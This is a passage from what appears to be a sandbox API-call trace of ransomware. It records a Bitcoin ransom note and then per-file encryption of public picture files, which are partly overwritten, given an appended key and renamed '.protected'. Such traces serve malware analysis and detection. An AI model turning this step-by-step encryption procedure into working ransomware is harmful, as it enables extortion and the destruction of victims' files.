Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.763] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.763] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.763] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.763] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.763] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.763] CloseHandle (hObject=0xa4) returned 1 [0095.764] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.764] lstrcmpiW (lpString1="Pictures", lpString2="Windows") returned -1 [0095.764] lstrcmpiW (lpString1="Pictures", lpString2="Program Files") returned -1 [0095.764] lstrcmpiW (lpString1="Pictures", lpString2="Program Files (x86)") returned -1 [0095.764] lstrcmpiW (lpString1="Pictures", lpString2="$Recycle.bin") returned 1 [0095.764] lstrcmpiW (lpString1="Pictures", lpString2="System Volume Information") returned -1 [0095.764] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures") returned 28 [0095.764] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0095.764] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0095.764] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\*") returned 30 [0095.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.764] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.764] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.764] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.764] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.764] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.764] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\.") returned 30 [0095.764] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.764] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.764] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.764] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.764] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\." (normalized: "c:\\users\\public\\pictures\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.764] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.764] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.764] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.764] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.764] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.764] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.764] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\..") returned 31 [0095.764] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.764] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.764] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.764] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.764] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.765] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.765] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.765] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.765] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.765] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.765] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.765] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.765] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned 40 [0095.765] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.765] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.765] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.765] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.765] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned 40 [0095.765] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.765] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned 40 [0095.765] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.765] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned 40 [0095.765] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.765] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x17c, lpOverlapped=0x0) returned 1 [0095.766] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.766] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x17c, lpOverlapped=0x0) returned 1 [0095.766] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.766] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.766] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.766] CloseHandle (hObject=0xb4) returned 1 [0095.766] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini.protected") returned 50 [0095.766] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini.protected" (normalized: "c:\\users\\public\\pictures\\desktop.ini.protected")) returned 1 [0095.767] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.767] lstrcmpiW (lpString1="Sample Pictures", lpString2="Windows") returned -1 [0095.767] lstrcmpiW (lpString1="Sample Pictures", lpString2="Program Files") returned 1 [0095.767] lstrcmpiW (lpString1="Sample Pictures", lpString2="Program Files (x86)") returned 1 [0095.767] lstrcmpiW (lpString1="Sample Pictures", lpString2="$Recycle.bin") returned 1 [0095.767] lstrcmpiW (lpString1="Sample Pictures", lpString2="System Volume Information") returned -1 [0095.767] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures") returned 44 [0095.767] lstrcmpW (lpString1="Sample Pictures", lpString2=".") returned 1 [0095.767] lstrcmpW (lpString1="Sample Pictures", lpString2="..") returned 1 [0095.767] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*") returned 46 [0095.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0095.776] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.776] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.776] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.776] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.776] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.776] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\.") returned 46 [0095.776] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.776] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.776] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.776] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.777] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\." (normalized: "c:\\users\\public\\pictures\\sample pictures\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.777] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.777] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.777] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.777] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.777] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.777] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.777] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\..") returned 47 [0095.777] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.777] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.777] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.777] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.777] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.777] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\.." (normalized: "c:\\users\\public\\pictures"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.777] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.777] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="Windows") returned -1 [0095.777] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="Program Files") returned -1 [0095.777] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="Program Files (x86)") returned -1 [0095.777] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="$Recycle.bin") returned 1 [0095.777] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="System Volume Information") returned -1 [0095.777] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0095.777] StrStrIW (lpFirst="Chrysanthemum.jpg", lpSrch=".protected") returned 0x0 [0095.778] lstrcmpW (lpString1="Chrysanthemum.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0095.778] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.778] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.779] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0095.779] StrStrW (lpFirst="Chrysanthemum.jpg", lpSrch=".txt") returned 0x0 [0095.779] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0095.779] StrStrW (lpFirst="Chrysanthemum.jpg", lpSrch=".rar") returned 0x0 [0095.779] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0095.779] StrStrW (lpFirst="Chrysanthemum.jpg", lpSrch=".zip") returned 0x0 [0095.779] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.780] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.780] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.780] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.781] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.812] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.812] CloseHandle (hObject=0xd4) returned 1 [0095.813] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.protected") returned 72 [0095.813] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.protected")) returned 1 [0095.814] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.814] lstrcmpiW (lpString1="Desert.jpg", lpString2="Windows") returned -1 [0095.814] lstrcmpiW (lpString1="Desert.jpg", lpString2="Program Files") returned -1 [0095.814] lstrcmpiW (lpString1="Desert.jpg", lpString2="Program Files (x86)") returned -1 [0095.814] lstrcmpiW (lpString1="Desert.jpg", lpString2="$Recycle.bin") returned 1 [0095.814] lstrcmpiW (lpString1="Desert.jpg", lpString2="System Volume Information") returned -1 [0095.814] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0095.814] StrStrIW (lpFirst="Desert.jpg", lpSrch=".protected") returned 0x0 [0095.814] lstrcmpW (lpString1="Desert.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0095.814] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.814] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.815] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0095.815] StrStrW (lpFirst="Desert.jpg", lpSrch=".txt") returned 0x0 [0095.815] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0095.815] StrStrW (lpFirst="Desert.jpg", lpSrch=".rar") returned 0x0 [0095.815] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0095.815] StrStrW (lpFirst="Desert.jpg", lpSrch=".zip") returned 0x0 [0095.815] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.825] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.825] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.826] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.826] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.827] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.827] CloseHandle (hObject=0xd4) returned 1 [0095.836] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.protected") returned 65 [0095.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.protected")) returned 1 [0095.837] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.837] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.837] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.837] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.837] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.837] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.837] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 56 [0095.837] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.837] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.837] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.837] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.839] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 56 [0095.839] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.839] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 56 [0095.839] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.839] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini") returned 56 [0095.839] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.839] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x460, lpOverlapped=0x0) returned 1 [0095.841] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xfffffba0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.841] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x460, lpOverlapped=0x0) returned 1 [0095.842] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.842] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.842] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.842] CloseHandle (hObject=0xd4) returned 1 [0095.843] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.protected") returned 66 [0095.843] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample 